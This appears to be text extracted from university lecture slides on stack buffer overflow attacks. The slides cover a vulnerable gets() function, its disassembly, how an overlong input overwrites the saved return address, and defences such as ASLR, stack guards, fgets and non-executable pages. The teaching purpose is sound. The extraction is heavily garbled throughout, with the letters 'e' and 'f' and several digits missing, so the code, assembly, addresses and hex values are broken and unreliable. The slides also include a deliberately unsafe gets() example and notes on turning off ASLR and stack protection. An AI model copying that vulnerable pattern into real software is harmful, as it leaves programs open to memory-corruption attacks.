Buffer Overflow Attacks

CS- Spring 18 Bur Ovrlow Attacks Computr Systms 3.1.3-4,

CS- Spring 18 Hacking Roots in phon phraking Whit Hat vs Gray Hat vs Black Hat Ovr % o Modrn Sotwar Dvlopmnt is Black Hat! Tip th balanc: B a orc or good not vil!

CS- Spring 18 Disclaimr Bur Ovrlow Attack DO NOT ABUSE! Modrn cod is protctd rom this attack svral ways Ancint orm o hacking First documntd in 19 Usd in 1988 Morris Worm First intrnt virus Usd to hack Unix, Windows, Xbox, PS, Wii Taught hr as an xampl o what to watch out or!

CS- Spring 18 Exampl Vulnrabl Cod bool gtstring() { char bur[81]; bur[]='\'; gts(bur); i (strln(bur)>) { print("rad lin: %s\n",bur); rturn tru; } rturn als; } gts rads rom stdin until it inds ithr an nd-o-il or a nwlin (which is rplacd by a null trminator). gts copis whatvr it rads into th argumnt (bur). gts dos not chck to mak sur rsult its in spac allocatd.

CS- Spring 18 x8 xpansion bool gtstring() { } char bur[81]; bur[]='\'; gts(bur); i (strln(bur)>) { } print("rad lin: %s\n",bur); rturn tru; rturn als; mov jmp push %rbp mov %rsp,%rbp sub $x,%rsp movb $x,-x(%rbp) la -x(%rbp),%rax mov %rax,%rdi callq 44c <gts@plt> $x1,%ax 44 <gtstring+x4> mov $x,%ax lavq rtq la -x(%rbp),%rax movzbl (%rax),%ax tst %al,%al j 449 <gtstring+x4> la -x(%rbp),%rax mov %rax,%rsi mov $x41,%di mov $x,%ax callq 449 <print@plt>

CS- Spring 18 stack atr call to gtstring main s stack ram rturn addrss whil( (gs=gtstring())) {}; 833: b8 mov $x,%ax 838: 8 1c callq 89 <gtstring> 83d: 88 4 mov %al,-x1(%rbp) 84: 8 d cmpb $x,-x1(%rbp) 844: d jn 833 <main+x3> %rbp %rsp Addrss Valu (4 bit) FFF FFFF E89 FFF FFFF E98 FFF FFFF E888 1 4E FFF FFFF E88 FFF FFFF E988 FFF FFFF E88 483D FFF FFFF E8 FFF FFFF E88 FFF FFFF E88 FFF FFFF E8 FFF FFFF E818 FFF FDD 4 FFF FFFF E81 FFF FFFF E88 FFF FAA EDB FFF FFFF E8.

CS- Spring 18 stack in gtstring atr prambl bool gtstring() { %rbp 89: push %rbp 8a: 48 89 mov %rsp,%rbp 8d: 48 83 c sub $x,%rsp char bur[81]; bur[]='\'; main s %rbp 81: c 4 a movb $x,-x(%rbp) gtstring s stack ram main s stack ram rturn addrss bur %rsp Addrss Valu (4 bit) FFF FFFF E89 FFF FFFF E98 FFF FFFF E888 1 4E FFF FFFF E88 FFF FFFF E988 FFF FFFF E88 483D FFF FFFF E8 FFF FFFF E8A FFF FFFF E88 FFF FFFF E88 FFF FFFF E8 FFF FFFF E818 FFF FDD 4 FFF FFFF E81 FFF FFFF E88 FFF FAA EDB FFF FFFF E8.

CS- Spring 18 Stack lt to right (littl ndian) 4 8 9 3 9.... a 8 3 d 4 8 8 8 9 8c 81 8A 8 88 main s stack ram gtstring s stack ram bur rturn@ main s %rbp Addrsss x 8a x 483d This is Valus

CS- Spring 18 Bur Ovrlow Put a vry long string into an input il Much longr than th lngth o bur So long that it writs ovr what is past bur in gtstring s ram What is past bur? So long that it writs ovr th lowst addrss in main s ram! What is in th lowst addrss in main s ram?

CS- Spring 18 String in il (stdin) rad by gts 1 3 4 8 9 1 - - - - + - - - - - - - - + - - - - 3 - - - - + - - - - 4 - - - - + - - - - T h i s i s a c h a r a c t r s t r i n g t h a t g o s o n o r a v r y - - - - + - - - - - - - - + - - - - - - - - + - - - - 8 - - - - + - - - - 9 - - - - + - - - - l o n g d i s t a n c s o t h a t i t o v r l o w s i t s b u r m a i n A - - - - + - - - - B - - - - + - - - - C - - - - + - - - - D - - - - + - - - - E - - - - + - - - - s r b p r t a d d r main s bp Rturn Addrss! bur Alignmnt Padding

CS- Spring 18 Stack lt to right (littl ndian) 4 8 9 3 9 3.... d 1 9 3 4 1 4 4 9 8c 88 8d8 8 88 main s stack ram gtstring s stack ram bur rturn@ main s %rbp Addrsss This is a charactr string that gos on or a vry long distanc so that it ovrlows its bur Valus x 3 9 1d x4 41 4

CS- Spring 18 stack in gtstring atr gts gts(bur); %rbp 8: 48 8d 4 a la -x(%rbp),%rax 89: 48 89 c mov %rax,%rdi 8c: 8 3 callq b <gts@plt> i (strln(bur)>) { main s %rbp 81: 48 8d 4 a la -x(%rbp),%rax gtstring s stack ram main s stack ram rturn addrss bur %rsp Addrss Valu (4 bit) FFF FFFF E89 FFF FFFF E98 FFF FFFF E888 1 4E FFF FFFF E88 FFF FFFF E988 FFF FFFF E88 4 41 4 FFF FFFF E8 3 9 1d FFF FFFF E88 FFF FFFF E88 4 18 4 FFF FFFF E8 9 43 4 FFF FFFF E818 31 1 83 1 FFF FFFF E81 3 9 39 84 FFF FFFF E88 FFF FAA EDB FFF FFFF E8.

CS- Spring 18 stack in gtstring at rturn rturn addrss rturn tru; %rsp 894: b8 1 mov $x1,%ax 899: b jmp 8a <gtstring+x4> 8a: c9 lavq 8a1: c3 rtq %rip (valu is x4 41 4 ) Sgmntation Fault Addrss Valu (4 bit) FFF FFFF E89 FFF FFFF E98 FFF FFFF E888 1 4E FFF FFFF E88 FFF FFFF E988 FFF FFFF E88 4 41 4 FFF FFFF E8 3 9 1d FFF FFFF E88 FFF FFFF E88 4 18 4 FFF FFFF E8 9 43 4 FFF FFFF E818 31 1 83 1 FFF FFFF E81 3 9 39 84 FFF FFFF E88 FFF FAA EDB FFF FFFF E8.

CS- Spring 18 Mixing Hx and ASCII Normally trat a il as a string o ASCII charactrs In act, ach ASCII charactr has a hx rprsntation T h i s i s a c h a r a c 4 8 9 3 9 3 1 3 8 1 1 3 W can writ a program to put non-ascii hx data in a il S xmp_mix Us th command od Ax t x1z to show both ASCII and hx 4 8 9 3 9 3 1 3 8 1 1 3 >This is a charac< 1 4 3 4 9 d ad b a >tr string...< 1

CS- Spring 18 Exampl o a il with ASCII and Hx ASCII Rprsntation on trminal cat il This is a charactr stringþ¾ï Mixd rprsntation od Ax -t x1z il 4 8 9 3 9 3 1 3 8 1 1 3 >This is a charac< 1 4 3 4 9 d ad b a >tr string...< 1

CS- Spring 18 GEDIT Mixd Fil

CS- Spring 18 String in il (stdin) rad by gts 1 3 4 8 9 1 - - - - + - - - - - - - - + - - - - 3 - - - - + - - - - 4 - - - - + - - - - T h i s i s a c h a r a c t r s t r i n g t h a t g o s o n o r a v r y - - - - + - - - - - - - - + - - - - - - - - + - - - - 8 - - - - + - - - - 9 - - - - + - - - - l o n g d i s t a n c s o t h a t i t o v r l o w s i t s b u r A - - - - + - - - - B - - - - + - - - - C - - - - + - - - - D - - - - + - - - - E - - - - + - - - - b a d d a 4 8 b a d d main s bp Rturn Addrss! bur Alignmnt Padding

CS- Spring 18 Stack lt to right (littl ndian) 4 8 9 3 9 3.... b a d d b a d d a 4 8 9 8c 88 8d8 8 88 main s stack ram gtstring s stack ram bur rturn@ main s %rbp Addrsss This is a charactr string that gos on or a vry long distanc so that it ovrlows its bur Valus xdad b dad b x 48a

CS- Spring 18 stack in gtstring atr gts gts(bur); %rbp 8: 48 8d 4 a la -x(%rbp),%rax 89: 48 89 c mov %rax,%rdi 8c: 8 3 callq b <gts@plt> i (strln(bur)>) { main s %rbp 81: 48 8d 4 a la -x(%rbp),%rax gtstring s stack ram main s stack ram rturn addrss bur %rsp Addrss Valu (4 bit) FFF FFFF E89 FFF FFFF E98 FFF FFFF E888 1 4E FFF FFFF E88 FFF FFFF E988 FFF FFFF E88 48a FFF FFFF E8 dad b dad b FFF FFFF E88 FFF FFFF E88 4 18 4 FFF FFFF E8 9 43 4 FFF FFFF E818 31 1 83 1 FFF FFFF E81 3 9 39 84 FFF FFFF E88 FFF FAA EDB FFF FFFF E8.

CS- Spring 18 stack in gtstring atr gts mov $x1,%ax jmp 44 <gtstring+x4> lavq rtq main s stack ram rturn addrss bur %rbp gtstring s stack ram %rsp Addrss Valu (4 bit) FFF FFFF E9 FFF FFFF E9F FFF FFFF E8F8 FFF FA B4 FFF FFFF E8F FFF FFFF E9F FFF FFFF E8E8 FE D4C 3BA 198 FFF FFFF E8E FFF FFFF E8D8 FFF FFFF E898 4 D9 FFF FFFF E89 4 34 9 FFF FFFF E888 1 38 1 13 FFF FFFF E88 48 93 9 3 FFF FFFF E88 4 4 FFF FFFF E8 1.

CS- Spring 18 What could b at rturn addrss? Your vil cod!

CS- Spring 18 Problms with Bur Ovrlow Attack Nd to know ost rom bur to top o stack / rturn @ Nd to mix ASCII with hxadcimal in input il String can t contain nwlin (xa) Nd to know addrss o pirat routin to rturn to Hard to rturn to convntional low atr attack rturn @ ovrwrittn %rbp has bn ovrwrittn lost top o callr s stack ram Gt that rom objdump d Can writ a program to do that Basic rstriction Challng or projct 4 Can gt original rturn@ rom objdump d, or just don t rturn %rsp points to bottom o callr s ram, and w can ind its siz rom objdump d, or just don t us

CS- Spring 18 Addrss Spac Layout Randomization ASLR is a atur introducd to prvnt things lik bur ovrlow attacks Randomizs whr your cod is loadd Evry tim you xcut, your unction is loadd at a dirnt addrss Hnc objdump no longr prints complt addrss just last thr digits ASLR will prvnt rturn to a dirnt unction in th sam cod unction instructions ar at a dirnt plac ach run gdb turns o ASLR cod is always loadd at x xxxx To turn o ASLR on LDAP: >starch linux4 R <command>

CS- Spring 18 Prvnting Bur Ovrlow w/ Guard bool gtstring() { struct bustr { char bur[81]; int guard; } bu = { { x } { xfedcba98 }} ; gts(bu.bur); i (strln(bur)>) { assrt(bu.guard==xfedcba98); print("rad lin: %s\n",bu.bur); rturn tru; } rturn als; } guard gos in stack ram atr (on top o) bur I bur ovrlow occurs, guard will b modiid I bur ovrlow occurs, assrt will ail Unlss hackr did objdump and put th guard valu in his hackd il

CS- Spring 18 gcc stack guarding I you compil with th stack-protctor lag, gcc will automatically provid stack guards or you I gcc inds a corruptd stack guard, it prints *** stack smashing dtctd ***:./targt trminatd Sgmntation ault gcc stack protction is OFF by dault on LDAP machins

CS- Spring 18 Prvnting Bur Ovrlow w/ gts bool gtstring() { char bur[81]; bur[]='\'; gts(bur,sizo(bur),stdin); i (strln(bur)>) { print("rad lin: %s\n",bur); rturn tru; } rturn als; } gts rads rom any stram (third paramtr) gts rads until EITHER nwlin (x1), OR scond paramtr rachd. gts prvnts bur ovrwrit

CS- Spring 18 Prvnting w/ Mmory Protction Your ntir addrss spac is dividd into 49 byt pags 49= 1 ; It taks 1 bits, or 3 hx digits to count rom to 49 4 bit addrsss irst bits (13 hx charactrs) ar pag numbr 4 bit addrsss last 1 bits (3 hx charactrs) ar ost within pag Each pag in mmory has thr indpndnt scurity attributs: Can I rad mmory in this pag Can I writ mmory in this pag Can I xcut instructions in this pag I you try to prorm an action on a pag which is not allowd, you will gt a sgmntation violation

CS- Spring 18 Dault Mmory Protction Whn you cod is loadd into mmory, it is loadd in pags that allow rad and xcut, but not writ Pags in th stack allow rad or writ, but not xcution Pags on th hap (malloc d spac) allow rad or writ, but not xcution Thr ar library routins to modiy mmory protction or a pag, but by dault, thr is no mmory you ar allowd to both writ to, and xcut rom. I your vil cod is not alrady loadd, it s hard to xcut it! Projct 4 has spcial cod to avoid this problm!